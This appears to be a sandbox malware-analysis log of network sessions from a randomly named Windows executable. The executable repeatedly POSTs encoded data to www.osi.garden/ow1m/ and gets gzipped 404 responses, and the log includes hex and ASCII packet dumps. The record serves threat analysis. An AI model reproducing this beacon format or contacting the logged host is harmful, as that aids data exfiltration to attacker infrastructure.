                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.45003868.65.122.222805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:19.079180956 CEST666OUTPOST /ow1m/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.osi.garden
                                                                                              Origin: http://www.osi.garden
                                                                                              Referer: http://www.osi.garden/ow1m/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 32 61 69 36 6d 4e 69 64 6b 6d 2b 72 76 6e 58 30 5a 47 41 4e 6a 67 35 4c 72 76 4a 46 73 47 4a 57 66 61 77 6e 58 64 66 2f 38 34 72 36 61 55 77 41 39 34 51 64 65 34 72 6c 63 34 32 4a 52 53 6b 7a 32 58 67 54 6d 44 68 75 64 49 5a 67 49 30 65 55 68 48 30 6b 55 54 4c 48 34 4e 65 62 6f 46 6a 34 73 77 50 71 54 71 33 57 47 71 2f 67 74 62 31 4c 37 45 6b 42 6c 4d 65 31 45 42 47 34 59 50 2b 71 38 77 75 2f 4b 41 46 43 6d 30 52 38 35 78 7a 44 31 43 6c 63 76 65 43 65 48 65 65 63 76 53 45 39 51 6f 63 44 67 52 4c 4c 69 72 51 4d 61 58 36 74 4d 46 30 76 33 45 4e 4c 53 31 63 79 4d 67 54 74 41 3d 3d
                                                                                              Data Ascii: FJiPC=c2ai6mNidkm+rvnX0ZGANjg5LrvJFsGJWfawnXdf/84r6aUwA94Qde4rlc42JRSkz2XgTmDhudIZgI0eUhH0kUTLH4NeboFj4swPqTq3WGq/gtb1L7EkBlMe1EBG4YP+q8wu/KAFCm0R85xzD1ClcveCeHeecvSE9QocDgRLLirQMaX6tMF0v3ENLS1cyMgTtA==
                                                                                              Oct 8, 2024 05:30:19.656265974 CEST1236INHTTP/1.1 404 Not Found
                                                                                              keep-alive: timeout=5, max=100
                                                                                              content-type: text/html
                                                                                              transfer-encoding: chunked
                                                                                              content-encoding: gzip
                                                                                              vary: Accept-Encoding
                                                                                              date: Tue, 08 Oct 2024 03:30:19 GMT
                                                                                              server: LiteSpeed
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              connection: close
                                                                                              Data Raw: 31 33 33 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                              Data Ascii: 1338Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F
                                                                                              Oct 8, 2024 05:30:19.656378031 CEST1236INData Raw: 9f c9 f3 2f 29 f0 22 07 fa 4b 1a 65 cf fb bb 07 68 3c a2 8b fe af 37 6c 6e a3 f6 86 3c 18 af c8 ab cb 0a f5 00 95 20 71 86 e2 f2 c6 70 a0 0f 6d a8 58 7e 92 77 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18
                                                                                              Data Ascii: /)"Keh<7ln< qpmX~wPy>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1
                                                                                              Oct 8, 2024 05:30:19.656382084 CEST1236INData Raw: d9 1b 52 00 84 b9 9b ee 15 99 71 5d c9 e0 bd de 04 b6 93 4d 0b 7d a6 70 e6 44 9e f6 1d e6 86 b3 88 63 f3 34 3e 13 3d 49 24 70 d6 6c c4 74 13 c6 7a 85 3a 23 7b 6c 4b 16 18 8f f1 14 ab 77 89 c9 09 e1 5c 66 e2 51 d6 2c 04 7a 7f 9e 5b 2b 81 17 24 c0
                                                                                              Data Ascii: Rq]M}pDc4>=I$pltz:#{lKw\fQ,z[+$VDLgcP/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8
                                                                                              Oct 8, 2024 05:30:19.656387091 CEST672INData Raw: 38 8b c3 1d 52 3e f5 08 69 f6 8b b2 a7 83 fc e4 6e 50 53 08 96 e4 09 5f 10 12 6c 26 d4 56 46 c8 36 77 47 e5 2e 66 09 ae 68 89 ec e0 af 90 2c 34 c6 34 26 50 a4 3a aa c9 25 d8 f4 7a df c4 59 d0 cc b0 15 4d b2 86 41 1a 1d 7b ac 53 87 9f ee 32 23 5a
                                                                                              Data Ascii: 8R>inPS_l&VF6wG.fh,44&P:%zYMA{S2#Z^%8r7Gas&/q:;I]zmcgy1cm?RgA4YjWalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#
                                                                                              Oct 8, 2024 05:30:19.656390905 CEST832INData Raw: 96 ac 6e 9b f4 5c 17 36 82 b6 8a 59 c7 f1 33 43 8b b6 82 28 69 3c bf 77 b3 be 08 65 41 d3 b2 70 eb 32 db d8 50 1b 29 24 f8 8e 9e 6d 6b 00 78 6b bc 3b 04 48 d7 38 b4 2d 26 c4 b6 9d 98 da 09 71 11 b6 f5 48 24 54 27 ab 23 08 f4 e1 5f 26 37 33 4c 4a
                                                                                              Data Ascii: n\6Y3C(i<weAp2P)$mkxk;H8-&qH$T'#_&73LJ(YOOa8lr qFru;oa~u4rE~Q|z\n4^@En^BnTQ{wz3yx|eZ'{?L%~\}q#r


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.45003968.65.122.222805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:21.620862007 CEST686OUTPOST /ow1m/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.osi.garden
                                                                                              Origin: http://www.osi.garden
                                                                                              Referer: http://www.osi.garden/ow1m/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 32 61 69 36 6d 4e 69 64 6b 6d 2b 36 38 76 58 34 61 75 41 59 54 67 6d 45 4c 76 4a 53 38 47 4e 57 66 57 77 6e 57 5a 31 2f 4a 6f 72 36 2b 63 77 42 38 34 51 51 2b 34 72 77 73 35 39 57 42 53 37 7a 32 61 66 54 6b 6e 68 75 64 4d 5a 67 4a 45 65 55 57 37 31 6c 45 54 46 4b 59 4e 51 57 49 46 6a 34 73 77 50 71 54 75 4a 57 43 47 2f 68 64 72 31 4c 61 45 6e 4a 46 4d 66 79 45 42 47 72 49 50 36 71 38 77 59 2f 50 67 2f 43 6b 38 52 38 35 42 7a 44 67 32 6d 56 76 65 59 51 6e 66 39 63 76 6d 55 77 6a 41 56 4e 7a 70 33 43 44 33 70 4a 63 47 67 38 39 6b 6a 39 33 67 2b 57 56 38 6f 2f 50 64 61 32 47 35 4b 49 31 35 63 6a 61 52 72 36 63 4e 76 6a 51 6e 2f 74 52 41 3d
                                                                                              Data Ascii: FJiPC=c2ai6mNidkm+68vX4auAYTgmELvJS8GNWfWwnWZ1/Jor6+cwB84QQ+4rws59WBS7z2afTknhudMZgJEeUW71lETFKYNQWIFj4swPqTuJWCG/hdr1LaEnJFMfyEBGrIP6q8wY/Pg/Ck8R85BzDg2mVveYQnf9cvmUwjAVNzp3CD3pJcGg89kj93g+WV8o/Pda2G5KI15cjaRr6cNvjQn/tRA=
                                                                                              Oct 8, 2024 05:30:22.208457947 CEST1236INHTTP/1.1 404 Not Found
                                                                                              keep-alive: timeout=5, max=100
                                                                                              content-type: text/html
                                                                                              transfer-encoding: chunked
                                                                                              content-encoding: gzip
                                                                                              vary: Accept-Encoding
                                                                                              date: Tue, 08 Oct 2024 03:30:22 GMT
                                                                                              server: LiteSpeed
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              connection: close
                                                                                              Data Raw: 31 33 33 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 84 49 80 24 10 20 81 84 52 a9 5d 08 9a 41 8c 62 96 52 79 a0 bc 46 9e 2c 85 6c 2f cb b2 bd d7 4e 2a 17 e9 1b 44 ff dd df 3f ff dd ea e6 b7 df 7e 7b fc 3b 7e c9 ad 6d 4d 80 c2 3a 4d 7e fc f6 f8 fc 80 20 08 7a 0c 81 e3 fd f8 ed f2 33 05 b5 03 85 75 5d dc 83 63 13 b5 4f 77 5c 9e d5 20 ab ef eb 53 01 ee 20 f7 f9 ed e9 ae 06 7d 8d 0c 10 7f 83 dc d0 29 2b 50 3f 35 b5 7f 4f df 7d 89 e3 b8 21 b8 1f e6 97 79 72 05 94 e5 f7 ee 40 fa 72 a2 56 3a 41 ea fc 4f 66 08 7d 11 95 a0 ba 9a 82 be 43 cf 9c 14 3c dd b5 11 e8 8a bc ac af 86 75 91 57 87 4f 1e 68 23 17 dc 5f 5e be 41 51 16 d5 91 93 dc 57 ae 93 80 27 ec fb 4f a8 3a aa 13 f0 83 44 49 48 cd 6b 68 9a 37 99 f7 88 3c 77 3e 9b b2 aa 4f 09 80 06 bb bd 98 cb ad aa 17 39 06 53 ef 73 ef 04 fd fb 65 e8 f0 3a 34 3f cf ea 7b df 49 a3 e4 f4 00 31 65 e4 24 df 20 09 24 2d a8 23 d7 f9 06 55 4e 56 dd 57 a0 8c fc bf 7d 9c 56 45 67 f0 00 61 64 d1 bf 27 26 51 06 ee 43 [TRUNCATED]
                                                                                              Data Ascii: 1338ZrzOAJrN%cI$ R]AbRyF,l/N*D?~{;~mM:M~ z3u]cOw\ S })+P?5O}!yr@rV:AOf}C<uWOh#_^AQW'O:DIHkh7<w>O9Sse:4?{I1e$ $-#UNVW}VEgad'&QCaaIO;nnJNiyQ<@7SQ?~_y{xQU$'>e8=y~3{!VHkiUg2?Q^NTnyv?GKTy|?W.bSg?WmKT!pu%(S?@Y~nj+W|B0$~+mzio+-o%rPCG5HE!-'v8uMWxkp5gjqY_yW^?wkQ{9B(~k9*%/$7iQv$2|7GJwSUM%X~5T.v( d5(oo%?tYp 6(u[7T{:r,oXsq'h./}<$y@r<mIZ73|^OunJ_&oj2?JoK_lyqy>}(^LLI$
                                                                                              Oct 8, 2024 05:30:22.208472967 CEST1236INData Raw: 3e 93 e7 5f 52 e0 45 0e f4 97 34 ca 9e f7 77 0f d0 78 44 17 fd 5f 6f d8 dc 46 ed 0d 79 30 5e 91 57 97 15 ea 01 2a 41 e2 0c c5 e5 8d e1 40 1f da 50 b1 fc 24 ef 1e a0 30 f2 3c 90 7d 1c 71 b5 3e 5d 22 fb 39 af df 8f 7b 33 e7 80 79 2b da a7 ab c8 30
                                                                                              Data Ascii: >_RE4wxD_oFy0^W*A@P$0<}q>]"9{3y+0gV|7Jh@ygLC>QYn%gD4K uWx#%e1}Uo8!#|@(4?,f{x\$^6W0shOH*7aq^6
                                                                                              Oct 8, 2024 05:30:22.208493948 CEST1236INData Raw: 37 a4 00 08 73 37 dd 2b f2 c4 75 25 83 f3 7a 13 d8 4e 36 2d f4 99 c2 9a bc 3c ed 3b cc 0d 67 11 cb e4 69 7c 26 7a 92 48 e0 ac d9 88 e9 26 8c f5 0a 75 46 f6 d8 96 2c 30 1e e3 29 56 ef 12 93 15 c2 b9 3c 89 47 59 b3 10 e8 fd 79 6e ad 04 4e 90 00 b7
                                                                                              Data Ascii: 7s7+u%zN6-<;gi|&zH&uF,0)V<GYynN[%31[+zZCE0Zgsa8:bt:Gvnl=nH4V[ aog(vE+m`JYV]i.Uf.75GdBdYOXw1-#!OW
                                                                                              Oct 8, 2024 05:30:22.208503008 CEST1236INData Raw: 6b b1 b8 43 ca a7 1e 21 cd 7e 51 f6 74 90 9f dc 0d 6a 0a c1 92 3c e1 0b 42 82 cd 84 da ca 08 d9 e6 ee a8 dc c5 0c c1 16 2d 91 1d fc 15 92 85 c6 98 c6 04 8a 54 47 35 b9 04 9b 5e ef 9b 38 0b 9a 19 b6 a2 49 c6 30 48 a3 63 8e 75 ea 70 d3 5d 66 44 0b
                                                                                              Data Ascii: kC!~Qtj<B-TG5^8I0Hcup]fD<+0GX(}vsVd3:r5Ng=K0MnlZ,/v_utnrv(bhZU`hiWgR0{m9WP+?{:),wT*BZ,Qf4nJ_fsWM]O{j
                                                                                              Oct 8, 2024 05:30:22.208523035 CEST268INData Raw: d2 5f 5e 42 e9 af ef c2 e2 1a e7 a2 e5 7b 07 7e 24 ff 91 99 1e 93 e8 9d e6 cf f6 b9 fb f1 88 7c 35 eb 11 f9 cc 27 37 51 f4 89 5c 57 05 e0 55 c4 c7 e7 8b bb f7 56 fe d3 21 f5 9a d4 c3 f7 5a 0f 08 e2 16 4e 06 92 21 8b 91 7f 6e ea f4 f7 2a 6f 4a 17
                                                                                              Data Ascii: _^B{~$|5'7Q\WUV!ZN!n*oJ<=wwaCpOnA~#I''%Kt;vOwws;W?bw/Wmp=tw6{<GpAhmC#rGyz|


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.45004068.65.122.222805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:24.167464018 CEST10768OUTPOST /ow1m/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.osi.garden
                                                                                              Origin: http://www.osi.garden
                                                                                              Referer: http://www.osi.garden/ow1m/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 63 32 61 69 36 6d 4e 69 64 6b 6d 2b 36 38 76 58 34 61 75 41 59 54 67 6d 45 4c 76 4a 53 38 47 4e 57 66 57 77 6e 57 5a 31 2f 4a 67 72 36 4a 63 77 42 66 67 51 52 2b 34 72 78 73 34 36 57 42 54 6e 7a 32 53 62 54 6b 71 65 75 66 6b 5a 68 76 59 65 57 69 76 31 71 45 54 46 44 34 4e 64 62 6f 45 35 34 73 67 4c 71 54 2b 4a 57 43 47 2f 68 62 76 31 4d 4c 45 6e 4c 46 4d 65 31 45 42 53 34 59 50 53 71 39 56 74 2f 50 6b 56 44 55 63 52 39 64 6c 7a 50 32 71 6d 58 50 65 65 58 6e 66 62 63 76 37 54 77 6a 64 73 4e 79 64 5a 43 44 54 70 45 70 61 35 72 38 6f 6c 75 56 38 6b 43 45 41 73 30 2f 74 6b 2b 52 4a 72 45 6c 35 4c 7a 72 35 2b 77 2f 67 6d 34 77 50 61 79 6d 74 32 65 4a 37 71 72 31 53 68 63 6f 76 56 31 71 6f 75 33 7a 78 30 38 53 4e 65 30 75 49 4f 71 6d 42 72 7a 4c 52 38 43 72 42 32 43 71 33 78 2b 57 77 44 6e 6c 4e 4c 59 49 41 6d 4f 36 32 73 78 6f 45 6b 52 4d 59 64 44 63 54 54 64 53 77 68 58 66 44 44 6a 69 30 33 48 39 4d 45 48 42 69 75 37 62 59 65 4d 43 59 2b 41 69 36 71 69 44 70 39 32 46 70 65 6e 32 34 46 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=c2ai6mNidkm+68vX4auAYTgmELvJS8GNWfWwnWZ1/Jgr6JcwBfgQR+4rxs46WBTnz2SbTkqeufkZhvYeWiv1qETFD4NdboE54sgLqT+JWCG/hbv1MLEnLFMe1EBS4YPSq9Vt/PkVDUcR9dlzP2qmXPeeXnfbcv7TwjdsNydZCDTpEpa5r8oluV8kCEAs0/tk+RJrEl5Lzr5+w/gm4wPaymt2eJ7qr1ShcovV1qou3zx08SNe0uIOqmBrzLR8CrB2Cq3x+WwDnlNLYIAmO62sxoEkRMYdDcTTdSwhXfDDji03H9MEHBiu7bYeMCY+Ai6qiDp92Fpen24FI3CcBaxfRDtmOkL0xuJVbt6Yy96F4TNHylTA6bfPTczR7RWzKARxJe8KtlgC4AQng6yvGMy4vh01SC5HcNRp3Nipcc2futN/Ko7rxIKazu+vZVPd1hLA6bQQWfu5BFrOUyJwxHkn117QDilRxFCPIXEvPkhnPRGSt1Mug8QUo7/8JRCqTrZi0TpNZxsYUbxbWfugf4XKTCyylQzdtdTdaZhqpFbFU9FBoGff6QEgGtgcXp1L/hHAfwS0JMpOqY9tDCvLnGlWNH+OWxc/M2bsX5Ad0zb99l8pcUd1PhwoUf0wALEjttdRrta2d2tgRFqFjDGl16Ouu0FW5wPBM6WXQEBt38GElqJeSsTKs/l/9xxsquY91CpuDs7ZThmVTMB4B3C/VoHqeuE30qk0WERptLkSknpR8I9ZBa7jDyg+cm/pvnUIqaYN91jqSPon6ls/dCgAfI+2Os9P4Znt35UG425APDvKHdyUIoTbCu2AlDuJo5P6RfhVc8HJxqeEn+DydOfFdQJVC/FL1Rm8VVXOO7Gh5rO5EOEySvFNOjQNrcm4NpbscTtWhl6boVJyFzHSHJ/Ds61IVcBUJwXEAMuIYY8AROIlonvuUawTpWHobGdu/tf6vCMB5b14TPNVQFCvyDBIL6LX/O9N3/yrDSEN04gj3YewdLVnYG [TRUNCATED]
                                                                                              Oct 8, 2024 05:30:24.869760990 CEST1236INHTTP/1.1 404 Not Found
                                                                                              keep-alive: timeout=5, max=100
                                                                                              content-type: text/html
                                                                                              transfer-encoding: chunked
                                                                                              content-encoding: gzip
                                                                                              vary: Accept-Encoding
                                                                                              date: Tue, 08 Oct 2024 03:30:24 GMT
                                                                                              server: LiteSpeed
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              connection: close
                                                                                              Data Raw: 31 33 33 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 84 49 80 24 10 20 81 84 52 a9 5d 08 9a 41 8c 62 96 52 79 a0 bc 46 9e 2c 85 6c 2f cb b2 bd d7 4e 2a 17 e9 1b 44 ff dd df 3f ff dd ea e6 b7 df 7e 7b fc 3b 7e c9 ad 6d 4d 80 c2 3a 4d 7e fc f6 f8 fc 80 20 08 7a 0c 81 e3 fd f8 ed f2 33 05 b5 03 85 75 5d dc 83 63 13 b5 4f 77 5c 9e d5 20 ab ef eb 53 01 ee 20 f7 f9 ed e9 ae 06 7d 8d 0c 10 7f 83 dc d0 29 2b 50 3f 35 b5 7f 4f df 7d 89 e3 b8 21 b8 1f e6 97 79 72 05 94 e5 f7 ee 40 fa 72 a2 56 3a 41 ea fc 4f 66 08 7d 11 95 a0 ba 9a 82 be 43 cf 9c 14 3c dd b5 11 e8 8a bc ac af 86 75 91 57 87 4f 1e 68 23 17 dc 5f 5e be 41 51 16 d5 91 93 dc 57 ae 93 80 27 ec fb 4f a8 3a aa 13 f0 83 44 49 48 cd 6b 68 9a 37 99 f7 88 3c 77 3e 9b b2 aa 4f 09 80 06 bb bd 98 cb ad aa 17 39 06 53 ef 73 ef 04 fd fb 65 e8 f0 3a 34 3f cf ea 7b df 49 a3 e4 f4 00 31 65 e4 24 df 20 09 24 2d a8 23 d7 f9 06 55 4e 56 dd 57 a0 8c fc bf 7d 9c 56 45 67 f0 00 61 64 d1 bf 27 26 51 06 ee 43 [TRUNCATED]
                                                                                              Data Ascii: 1338ZrzOAJrN%cI$ R]AbRyF,l/N*D?~{;~mM:M~ z3u]cOw\ S })+P?5O}!yr@rV:AOf}C<uWOh#_^AQW'O:DIHkh7<w>O9Sse:4?{I1e$ $-#UNVW}VEgad'&QCaaIO;nnJNiyQ<@7SQ?~_y{xQU$'>e8=y~3{!VHkiUg2?Q^NTnyv?GKTy|?W.bSg?WmKT!pu%(S?@Y~nj+W|B0$~+mzio+-o%rPCG5HE!-'v8uMWxkp5gjqY_yW^?wkQ{9B(~k9*%/$7iQv$2|7GJwSUM%X~5T.v( d5(oo%?tYp 6(u[7T{:r,oXsq'h./}<$y@r<mIZ73|^OunJ_&oj2?JoK_lyqy>}(^LLI$
                                                                                              Oct 8, 2024 05:30:24.869800091 CEST224INData Raw: 3e 93 e7 5f 52 e0 45 0e f4 97 34 ca 9e f7 77 0f d0 78 44 17 fd 5f 6f d8 dc 46 ed 0d 79 30 5e 91 57 97 15 ea 01 2a 41 e2 0c c5 e5 8d e1 40 1f da 50 b1 fc 24 ef 1e a0 30 f2 3c 90 7d 1c 71 b5 3e 5d 22 fb 39 af df 8f 7b 33 e7 80 79 2b da a7 ab c8 30
                                                                                              Data Ascii: >_RE4wxD_oFy0^W*A@P$0<}q>]"9{3y+0gV|7Jh@ygLC>QYn%gD4K uWx#%e1}Uo8!#|@(4?,f{x\$^6W0
                                                                                              Oct 8, 2024 05:30:24.869808912 CEST1236INData Raw: 73 68 af db 9b 4f 48 af 2a a1 37 fb f4 61 da 8d 71 5e 36 dc 9f 6e 99 87 e1 37 eb f5 57 39 fb 86 fa 49 f1 99 4c f0 ff 55 f1 f9 58 36 9a 32 f9 8b e7 d4 ce c3 a5 8c 20 45 16 fc 6d ef 54 60 44 7e 8b 2c 76 69 74 e8 5c 0c 72 86 61 18 75 65 86 82 19 30
                                                                                              Data Ascii: shOH*7aq^6n7W9ILUX62 EmT`D~,vit\raue0ca?Scbs#m1/t8j(S6peN<.1P1B:WaU^.8YNYg7qPG3ofS0R&gZ'i,.&i
                                                                                              Oct 8, 2024 05:30:24.870023012 CEST1236INData Raw: 93 64 59 4f f4 58 db 77 95 31 2d bc d4 db 23 21 4f af 57 3c d7 ad d9 86 de 10 68 b5 92 a3 d5 58 9b a8 dd 6e cc 05 0c e0 0f 89 a3 4c e2 9a e1 51 58 e9 bb b2 02 f4 b6 5a 3b 4a 6e c8 39 e7 ec d2 80 60 f5 60 71 2c 25 8b 63 1b e2 18 6e 08 98 61 96 61
                                                                                              Data Ascii: dYOXw1-#!OW<hXnLQXZ;Jn9``q,%cnaaWP.33]K;!5FA^M"Rr{6L 8NkPwrT]Hn^9"#kkH~P0-0]9N9)KFM|:f(jst^Gf!jraxH
                                                                                              Oct 8, 2024 05:30:24.870033979 CEST1236INData Raw: 8c 73 92 57 8b 4d ac d3 5d ce ce 4f 06 0c 7b e6 ba 6a 84 39 bc a0 0b 9c e5 49 5f f4 2a ff 18 f6 a2 be d6 77 49 23 99 8b 6d 69 54 e6 d4 67 05 74 19 9c e5 a4 74 0c ba 8d bb d1 31 db a6 0d bf 9a d2 46 b0 a2 eb 10 f6 e0 22 74 23 7a 3a f3 31 bf 73 8a
                                                                                              Data Ascii: sWM]O{j9I_*wI#miTgtt1F"t#z:1s$i;&!?!wp:zfx.TDl(yOkl35ZgaJtt fbfMxV4oGyux<<&=uTY={c54WbhrR
                                                                                              Oct 8, 2024 05:30:24.870049953 CEST44INData Raw: d7 23 72 ed b5 47 e4 79 9d 7a bc 7c 0e f7 e3 b7 ff 06 00 00 ff ff 0d 0a 41 0d 0a 03 00 db 22 6a 9d 6c 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: #rGyz|A"jl'0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.45004168.65.122.222805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:26.704163074 CEST402OUTGET /ow1m/?FJiPC=R0yC5R5LP37B+u7B47HBXCMiDtCwIfqPeOyqn1JZ4Ps9251xIaYYVL4nlvdWIAmm2UCAT0/m7O8NiPdCRWmEjk79M6Z+SJR86MwZjCyaTxX5jc3tUJ4oGgs=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.osi.garden
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:30:27.301913023 CEST1236INHTTP/1.1 404 Not Found
                                                                                              keep-alive: timeout=5, max=100
                                                                                              content-type: text/html
                                                                                              transfer-encoding: chunked
                                                                                              date: Tue, 08 Oct 2024 03:30:27 GMT
                                                                                              server: LiteSpeed
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              connection: close
